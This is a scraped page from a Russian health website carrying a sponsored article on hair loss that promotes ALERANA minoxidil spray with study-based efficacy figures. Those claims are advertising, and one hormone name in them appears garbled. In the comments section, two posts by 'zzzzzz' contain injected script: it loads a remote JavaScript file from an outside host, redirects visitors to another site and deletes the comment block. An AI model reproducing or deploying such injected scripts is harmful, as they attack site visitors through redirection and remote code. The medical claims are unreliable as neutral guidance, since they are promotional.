Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Расти коса до пояса, не в...  >>  Расти коса до пояса, не вырони ни волоса
 
Обратная связь
 

Расти коса до пояса, не вырони ни волоса

Размер шрифта
15 апреля 2013 00:00
  • google_analytics: false
  • Нравится

Как мы помним из классики, в человеке все должно быть прекрасно. И душа, и одежда, и, конечно же, волосы.

Красивые ухоженные здоровые волосы – это гордость их обладателя  и  предмет восхищения и зависти окружающих. Но современный ритм жизни, стрессы и экология постоянно угрожают здоровью, а значит, и красоте волос.

Достаточно ли хорошо Вы умеете справляться с этими угрозами?

Давайте проведем простой тест, чтобы узнать, в каком состоянии Ваши волосы сейчас  (тест надо проводить непосредственно перед мытьем волос, а для большей объективности не мойте голову на протяжении трех дней). Широко расставьте пальцы рук, положите их на голову и проведите руками по волосам, осторожно натянув их по направлению к концам. В процессе у вас выпадет несколько волосков. Положите их на лист бумаги и повторите процедуру около пяти раз на разных участках головы. Теперь сосчитайте количество волосков, лежащих на листке бумаги.

Тест

  • менее пяти волосинок
  • от 10 до 15 волосинок
  • более 15 волосинок

Полный вариант теста вы можете пройти на официальном сайте Alerana.

Если ваш вариант ответа – первый, то поздравляем: Вы правильно ухаживаете за волосами, и они совершенно здоровы. Если же Вы насчитали более 10 волосков, вам следует серьезно задуматься о борьбе с выпадением волос.

Наиболее распространенными причинами выпадения волос являются неправильный уход и неправильное питание, приводящее к нехватке нужных волосам витаминов. В этом случае для оздоровления волос необходимо просто сбалансировать свой рацион и начать употреблять достаточное количество витаминов и минеральных веществ. Кроме того, следует пересмотреть отношение как к процедуре ухода за волосами, так и непосредственно к самим средствам ухода.

Если же проблема выпадения волос приобрела системный характер, и Вы ежедневно сталкиваетесь с тем, что волос после мытья, расчесывания и сушки выпадает все больше, это тревожный сигнал. В такой ситуации может быть, что  потеря волос стала последствием какого-либо заболевания или перенесенного стресса. Увы, такую  проблему не  получится решить с помощью обычных средств по уходу за волосами. Тут требуется более серьезное отношение – волосы надо лечить с использованием специальных медицинских средств.

Для лечения андрогенетической алопеции (восстановление волосяного покрова) и стабилизации процесса выпадения волос у мужчин и женщин рекомендуется спрей для наружного применения ALERANA® с 2% или 5% содержанием  миноксидила.

Миноксидил воздействует непосредственно на волосяные фолликулы:

  • активизирует микроциркуляцию в коже головы
  • восстанавливает нормальное питание волосяных фолликулов
  • переводит волосы в фазу роста.

Т.е. миноксидил изменяет сосудистый тонус, улучшает питание и укрепляет корни волос за счет усиления притока крови к коже головы. Улучшение кровообращения вокруг волосяного фолликула позволяет дать жизнь новому здоровому волосу. И таким образом, миноксидил стимулирует переход волосяных фолликулов в активную фазу роста. 

Крайне важно, что в лечебном процессе миноксидил снижает воздействие андрогенов на волосяные фолликулы и уменьшает образование 5-альфа-дегидростерона, играющего существенную роль в формировании облысения.

Клинические исследования показали*, что после 6 недель применения спреев для наружного применения ALERANA® повышенное выпадение волос прекращается в 87% случаев, а после 4 месяцев применения  – в 73% случаев наблюдалось клиническое выздоровление и значительное улучшение, что свидетельствует о высокой эффективности препарата ALERANA® в лечении андрогенетической алопеции, повышенного выпадения волос и облысения.

*Открытое не сравнительное исследование по оценке эффективности, безопасности и переносимости лекарственного препарата ALERANA (2% и 5% раствор миноксидила), ВМА С.М. Кирова, 2012 год (6 недель / 4 месяца). 

Спрей для наружного применения ALERANA ® является лекарственным средством.

Р № ЛП-000224.

ИМЕЮТСЯ ПРОТИВОПОКАЗАНИЯ. ОЗНАКОМЬТЕСЬ С ИНСТРУКЦИЕЙ

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда о шампунях и кондиционерах   Вы неправильно моете голову! Как надо?   Как купить хороший подарок на Новый год   Как наносить духи  
25 июня 2013Компании, производящие краски для волос, разоряются! Изобретено лекарство против седины 14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься
 
04 июня 2013У вас лысый муж? Он может умереть от инфаркта 02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу
 

Слайдшоу

1
Потеря волос у мужчин. Лечение
Как справиться с волосами летом?
Как сэкономить и покрасить волосы дома?

Тесты

Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.